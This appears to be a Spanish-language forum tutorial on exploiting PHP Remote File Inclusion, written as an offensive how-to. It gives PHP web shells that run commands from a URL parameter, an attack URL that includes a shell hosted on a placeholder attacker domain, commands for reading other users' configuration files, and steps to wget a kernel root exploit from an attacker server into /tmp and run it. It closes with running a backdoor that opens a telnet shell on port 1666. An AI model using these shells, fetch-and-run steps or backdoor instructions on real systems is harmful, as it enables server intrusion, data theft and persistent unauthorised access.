www.digital-system.org - csuser.x[at]gmail[dot]com
########################################################################################
Remote File Inclusion
La famosa técnica RFI. Esta vulnerabilidad permite incluir archivos remotos de otros
servidores, la mayoría de estas vulnerabilidades se encuentran en códigos como:
********************
<?
include"$page";
?>
********************
Este seria explotado de esta manera:
********************************
vuln.php?page=http//[atacante]
********************************
Pero ¿A qué pagina enviamos este archivo? Lo mas normal es enviarlo a uno para poder
ejecutar comandos, el archivo podría tener cualquiera de estos:
****************************************************
<?
exec($_GET[cmd],$salida);
foreach($salida as $line) { echo "$line<br>"; }
?>
exec();
*******
<?
system($_GET[cmd],$salida);
foreach($salida as $line) { echo "$line<br>"; }
?>
system();
*******
<?
passthru($_GET[cmd],$salida);
foreach($salida as $line) { echo "$line<br>"; }
?>
passthru();
*****************************************************
Bien ya tenemos el archivo con este código le ponemos una extensión .gif .jpg cual sea
mientras no sea php sino lo ejecutaría en nuestro server. Lo subimos al server y lo
tenemos todo preparado, imaginemos que el url es
http://atacante.com/xpl.gif, en xpl.gif
debe haber uno de esos 3 códigos de arriba, cada uno usa una variante distinta ya que
algunos servidores puede que alguna la tenga bloqueada para que no hagan tonterías.
Ahora hacemos un url así...
--->
http://victima.com/vuln.php?page=http://atacante.com/xpl.gif?cmd=id;Podemos ver como estamos incluyendo nuestro archivo, inyectamos un código php y haciendo
que lo ejecute.
Entonces haríamos ..xpl.gif?cmd=[aquí el comando]
Allí va el comando a ejecutar, como una shell.
¿Qué podemos hacer con esto?
Pues muchas cosas, como por ejemplo comandos como "cat" para ver archivos como los de
configuración en texto plano, y así obtener información también podemos hacer cat en
los archivos de otros usuarios, por ejemplo:
***************************************************
---> "cd/home/fulanito/public_html;cat config.php"
O para conseguir una lista de archivos:
---> "cd/home/fulanito/public_html;ls"
***************************************************
Pues aun no esta lo mejor porque aun así sino tenemos permisos podemos obtenerlos por
medio de xploits. A continuación se explicará como utilizarlos.
EXPLOIT w00t
Podemos rootear la maquina con un xploit que aprovecha un bug en el kernel 2.4 el
exploit se llama w00t.
1º Descargaremos w00t.
2º Iremos a la carpeta /tmp hay podemos ejecutar exploits desde nobody (cd/tmp)
3º Subiremos el w00t al server por medio de wget para esto subí el archivo w00t a tu
server y ejecutamos lo siguiente dentro la carpeta tmp:
****************************
"wget
http://atacante/w00t"****************************
Esto recogerá el archivo w00t de tu server y lo pasara a la carpeta en la que estés (/tmp)
4º Lo que haremos ahora será dar permisos chmod 777 a w00t para poder ejecutarlo
(chmod -c 777 w00t)
5º Ahora lo ejecutaremos (./w00t)6
6º Ahora para saber si funciono escribiremos "id" y nos saldrá nuestro id, nos deberá dar
otro que no sea el de nobody con este no somos root pero tenemos bastantes permisos.
EXPLOIT r0nin
También podemos ejecutar un backdoor en el server para poder entrar con una shell aunque
sea como nobody pero nos puede ser muy útil.
Este xploit se llama r0nin como en la explicación anterior haremos lo mismo:
1º Descargaremos el xploit r0nin
2º Lo subiremos a la carpeta /tmp y le daremos permisos chmod 777 (explicado anteriormente)
3º Hay le ejecutaremos (./r0nin)
4º Si funciona bien veremos algo como: PsychoPhobia Backdoor is starting...OK, pid = xxxx,
(en la xxxx saldrá unos números que es el pid).
5º Bien ahora el backdoor esta ejecutado para entrar entraremos por telnet en el puerto 1666.
También podemos usar el PuTTy para esto. Aquí encontramos una shell como nobody o como lo
hayamos ejecutado.
hacker-24
Índice 
Últimas imágenes 
Tema: Remote File Inclusion 
